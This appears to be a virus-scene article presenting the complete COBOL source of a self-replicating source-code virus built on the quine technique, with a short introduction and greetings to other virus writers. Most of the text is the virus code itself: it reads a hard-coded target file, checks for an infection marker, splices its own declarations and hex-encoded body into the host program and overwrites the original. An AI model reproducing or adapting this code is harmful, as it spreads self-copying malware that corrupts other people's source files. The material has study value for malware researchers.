﻿                            Quine Viruses in COBOL
                              roy g biv / defjam


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:
COBOL line length is 72 characters, but I ignore that here.

010913 IDENTIFICATION DIVISION.
010913 PROGRAM-ID. QUINE.
010913 ENVIRONMENT DIVISION.
010913 INPUT-OUTPUT SECTION.
010913 FILE-CONTROL.
010913*the file to infect.  we cannot enumerate the directory
010913*so hard-coded filename
010913 SELECT A ASSIGN TO'VICTIM.CBL'
010913 ORGANIZATION IS LINE SEQUENTIAL.
010913 SELECT E ASSIGN TO'R'
010913 ORGANIZATION IS LINE SEQUENTIAL.
010913 DATA DIVISION.
010913 FILE SECTION.
010913 FD A
010913 RECORD CONTAINS 72 CHARACTERS.
010913 01 B.
010913 02 C PIC X(6).
010913 02 D PIC X(66).
010913 FD E
010913 RECORD CONTAINS 72 CHARACTERS.
010913 01 F.
010913 02 G PIC X(6).
010913 02 H PIC X(66).
010913 WORKING-STORAGE SECTION.
010913 01 I PIC 9(6).
010913 01 J PIC 9.
010913 01 K PIC 9.
010913 01 L PIC 999.
010913 01 M PIC 999.
010913 01 N PIC 999.
010913 01 O PIC 9(6).
010913 01 P PIC 999.
010913 01 Q PIC 999.
010913 01 R PIC 9(5).
010913 01 S PIC 999.
010913 01 T PIC 999.
010913 01 U PIC X(59).
010913 01 V PIC X(!!!!!).
010913 01 W PIC 99.
010913 PROCEDURE DIVISION.
010913*open host file
010913 OPEN INPUT A
010913 SET I TO 0
010913 SET J TO 0
010913 SET K TO 0
010913 SET M TO 0
010913 SET N TO 0
010913 SET O TO 0
010913 SET P TO 0
010913 SET Q TO 0
010913 SET R TO 0
010913 SET S TO 0
010913*read file line by line
010913 PERFORM UNTIL J=1 OR K>0
010913     READ A
010913         AT END SET J TO 1
010913     END-READ
010913     ADD 1 TO I
010913*watch for infection marker
010913     INSPECT D TALLYING K FOR ALL'QUINE'
010913     IF D(1:1)=' 'THEN
010913         SET L TO 0
010913         INSPECT D TALLYING L FOR ALL'DIVISION.'
010913         IF L=1 THEN
010913             INSPECT D TALLYING L FOR ALL'ENVIRONMENT'
010913*remember that host has ENVIRONMENT DIVISION
010913             IF L=2 THEN SET M TO I
010913             ELSE
010913                 INSPECT D TALLYING L FOR ALL'DATA'
010913*remember that host has DATA DIVISION
010913                 IF L=2 THEN SET N TO I
010913                 ELSE
010913                     INSPECT D TALLYING L FOR ALL'PROCEDURE'
010913*remember that host has PROCEDURE DIVISION
010913                     IF L=2 THEN SET O TO I
010913                     END-IF
010913                 END-IF
010913             END-IF
010913         ELSE
010913             INSPECT D TALLYING L FOR ALL'SECTION.'
010913             IF L=1 THEN
010913                 INSPECT D TALLYING L FOR ALL'INPUT-OUTPUT'
010913*remember that host has INPUT-OUTPUT SECTION
010913                 IF L=2 THEN SET P TO I
010913                 ELSE
010913                     INSPECT D TALLYING L FOR ALL'FILE'
010913*remember that host has FILE SECTION
010913                     IF L=2 THEN SET Q TO I
010913                     ELSE
010913                         INSPECT D TALLYING L FOR ALL'WORKING-STORAGE'
010913*remember that host has WORKING-STORAGE SECTION
010913                         IF L=2 THEN SET R TO I
010913                         END-IF
010913                     END-IF
010913                 END-IF
010913             ELSE
010913                 INSPECT D TALLYING L FOR ALL'FILE-CONTROL.'
010913*remember that host has FILE-CONTROL declaration
010913                 IF L=1 THEN SET S TO I
010913*we can omit END-IF when block is ended, to save some lines
010913 END-PERFORM
010913 CLOSE A
010913*if not infected and we found PROCEDURE DIVISION
010913 IF K=0 AND O>0 THEN
010913*open host and create temporary file
010913     OPEN INPUT A
010913     OPEN OUTPUT E
010913     SET L TO 1
010913     SET T TO I
010913*if host has ENVIRONMENT DIVISION
010913     IF M>0 THEN
010913*write file until that point
010913         PERFORM VARYING L FROM L BY 1 UNTIL L>M
010913             READ A
010913             SET F TO B
010913             WRITE F
010913         END-PERFORM
010913*if host has INPUT-OUTPUT SECTION inside ENVIRONMENT DIVISION
010913         IF P>0 THEN
010913*write file until that point
010913             PERFORM VARYING L FROM L BY 1 UNTIL L>P
010913                 READ A
010913                 SET F TO B
010913                 WRITE F
010913             END-PERFORM
010913*if host has FILE-CONTROL declaration inside INPUT-OUTPUT SECTION
010913             IF S>0 THEN
010913*write file until that point
010913                 PERFORM VARYING L FROM L BY 1 UNTIL L>S
010913                     READ A
010913                     SET F TO B
010913                     WRITE F
010913                 END-PERFORM
010913             END-IF
010913         END-IF
010913     ELSE
010913*use PROCEDURE DIVISION
010913         SET M TO O
010913*unless DATA DIVISION is present
010913         IF N>0 THEN SET M TO N
010913         END-IF
010913*write file until DIVISION statement
010913         PERFORM VARYING L FROM L BY 1 UNTIL L=M
010913             READ A
010913             SET F TO B
010913             WRITE F
010913         END-PERFORM
010913*write ENVIRONMENT DIVISION if needed
010913         SET H TO' ENVIRONMENT DIVISION.'
010913         WRITE F
010913         ADD 1 TO T
010913     END-IF
010913     IF S=0 THEN
010913         IF P=0 THEN
010913*write INPUT-OUTPUT SECTION if needed
010913             SET H TO' INPUT-OUTPUT SECTION.'
010913             WRITE F
010913             ADD 1 TO T
010913         END-IF
010913*write FILE-CONTROL declaration if needed
010913         SET H TO' FILE-CONTROL.'
010913         WRITE F
010913         ADD 1 TO T
010913     END-IF
010913*write FILE-CONTROL data
010913     SET H TO" SELECT A ASSIGN TO'VICTIM.CBL'"
010913     WRITE F
010913     SET U TO' ORGANIZATION IS LINE SEQUENTIAL.'
010913     SET H TO U
010913     WRITE F
010913     SET H TO" SELECT E ASSIGN TO'R'"
010913     WRITE F
010913     SET H TO U
010913     WRITE F
010913     ADD 4 TO T
010913*if host has FILE SECTION
010913     IF Q>0 THEN
010913*write file until that point
010913         PERFORM VARYING L FROM L BY 1 UNTIL L>Q
010913             READ A
010913             SET F TO B
010913             WRITE F
010913         END-PERFORM
010913     ELSE
010913*if host has DATA DIVISION SECTION
010913         IF N>0 THEN
010913*write file until that point
010913             PERFORM VARYING L FROM L BY 1 UNTIL L>N
010913                 READ A
010913                 SET F TO B
010913                 WRITE F
010913             END-PERFORM
010913         ELSE
010913*write file until PROCEDURE DIVISION
010913             PERFORM VARYING L FROM L BY 1 UNTIL L=O
010913                 READ A
010913                 SET F TO B
010913                 WRITE F
010913             END-PERFORM
010913             SET H TO' DATA DIVISION.'
010913             WRITE F
010913             ADD 1 TO T
010913         END-IF
010913*write FILE SECTION if needed
010913         SET H TO' FILE SECTION.'
010913         WRITE F
010913         ADD 1 TO T
010913     END-IF
010913*write FILE SECTION data
010913     SET H TO' FD A'
010913     WRITE F
010913     SET U TO' RECORD CONTAINS 72 CHARACTERS.'
010913     SET H TO U
010913     WRITE F
010913     SET H TO' 01 B.'
010913     WRITE F
010913     SET H TO' 02 C PIC X(6).'
010913     WRITE F
010913     SET H TO' 02 D PIC X(66).'
010913     WRITE F
010913     SET H TO' FD E'
010913     WRITE F
010913     SET H TO U
010913     WRITE F
010913     SET H TO' 01 F.'
010913     WRITE F
010913     SET H TO' 02 G PIC X(6).'
010913     WRITE F
010913     SET H TO' 02 H PIC X(66).'
010913     WRITE F
010913     ADD 10 TO T
010913*if host has WORKING-STORAGE SECTION
010913     IF R>0 THEN
010913*write file until that point
010913         PERFORM VARYING L FROM L BY 1 UNTIL L>R
010913             READ A
010913             SET F TO B
010913             WRITE F
010913         END-PERFORM
010913     ELSE
010913*write file until PROCEDURE DIVISION
010913         PERFORM VARYING L FROM L BY 1 UNTIL L=O
010913             READ A
010913             SET F TO B
010913             WRITE F
010913         END-PERFORM
010913*write WORKING-STORAGE SECTION if needed
010913         SET H TO' WORKING-STORAGE SECTION.'
010913         ADD 1 TO T
010913         WRITE F
010913     END-IF
010913*write WORKING-STORAGE SECTION data
010913     SET H TO' 01 I PIC 9(6).'
010913     WRITE F
010913     SET H TO' 01 J PIC 9.'
010913     WRITE F
010913     SET H TO' 01 K PIC 9.'
010913     WRITE F
010913     SET H TO' 01 L PIC 999.'
010913     WRITE F
010913     SET H TO' 01 M PIC 999.'
010913     WRITE F
010913     SET H TO' 01 N PIC 999.'
010913     WRITE F
010913     SET H TO' 01 O PIC 9(6).'
010913     WRITE F
010913     SET H TO' 01 P PIC 999.'
010913     WRITE F
010913     SET H TO' 01 Q PIC 999.'
010913     WRITE F
010913     SET H TO' 01 R PIC 9(5).'
010913     WRITE F
010913     SET H TO' 01 S PIC 999.'
010913     WRITE F
010913     SET H TO' 01 T PIC 999.'
010913     WRITE F
010913     SET H TO' 01 U PIC X(59).'
010913     WRITE F
010913     SET H TO' 01 V PIC X(!!!!!).'
010913     WRITE F
010913     SET H TO' 01 W PIC 99.'
010913     WRITE F
010913     ADD 15 TO T
010913*write file until PROCEDURE DIVISION
010913     PERFORM VARYING L FROM L BY 1 UNTIL L>O
010913         READ A
010913         SET F TO B
010913         WRITE F
010913     END-PERFORM
010913*place atoi(code,16) on next line for everything after PROCEDURE DIVISION, but without line numbers
010913*max line is 72 characters, so continue with "-'" lines in pos 6
010913     SET V TO''
010913*xlat table - COBOL has no concept of itoa()
010913     SET U TO' !"#$%&''()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ'
010913     SET W TO 1
010913*for each encoded character
010913     PERFORM VARYING O FROM 1 BY 1 UNTIL O>LENGTH OF V
010913*convert from ASCII hex to decimal
010913         SET M TO V(O:1)
010913         MULTIPLY 16 BY M
010913         ADD 1 TO O
010913         SET P TO V(O:1)
010913         EVALUATE V(O:1)
010913             WHEN'A'SET P TO 10
010913             WHEN'B'SET P TO 11
010913             WHEN'C'SET P TO 12
010913             WHEN'D'SET P TO 13
010913             WHEN'E'SET P TO 14
010913             WHEN'F'SET P TO 15
010913         END-EVALUATE
010913         ADD P TO M
010913         IF M=10 THEN
010913*erase remainder of line when LF if seen, and then write it
010913             SET H(W:)TO SPACES
010913             WRITE F
010913             ADD 1 TO T
010913             SET W TO 1
010913*ignore CR if present (I don't include them so I don't need this check)
010913*        ELSE IF M=13THEN
010913         ELSE
010913             SUBTRACT 31 FROM M
010913*itoa()
010913             SET H(W:1)TO U(M:1)
010913             ADD 1 TO W
010913*place atoi(code) with automatically split lines
010913             IF O=##### THEN
010913                 SET J TO 0
010913                 SET R TO 1
010913                 PERFORM UNTIL J=1
010913                     SET H(W:1)TO V(R:1)
010913                     ADD 1 TO W
010913                     ADD 1 TO R
010913                     IF R>LENGTH OF V THEN SET J TO 1
010913                     ELSE IF W=67 THEN
010913                         WRITE F
010913                         ADD 1 TO T
010913                         SET H(1:2)TO"-'"
010913                         SET W TO 3
010913                 END-PERFORM
010913     END-PERFORM
010913*write any remaining line
010913     IF W>2 THEN WRITE F
010913     END-IF
010913     SET H(1:1)TO' '
010913*write rest of host
010913     PERFORM VARYING L FROM L BY 1 UNTIL L=I
010913         READ A
010913         SET F TO B
010913         WRITE F
010913     END-PERFORM
010913     CLOSE E
010913     CLOSE A
010913*replace original file with temporary file
010913     OPEN INPUT E
010913     OPEN OUTPUT A
010913     SET L TO 1
010913     PERFORM VARYING L FROM L BY 1 UNTIL L=T
010913         READ E
010913         SET B TO F
010913         WRITE B
010913     END-PERFORM
010913     CLOSE A
010913     CLOSE E
010913*COBOL can't delete files
010913*it can truncate but we don't bother
010913 END-IF.
010913*QUINE - ROY G BIV 01/09/13


Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - Prototype -
Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras -
uNdErX - Vallez - Vecna - Whitehead


rgb/defjam september 2013
iam_rgb@hotmail.com
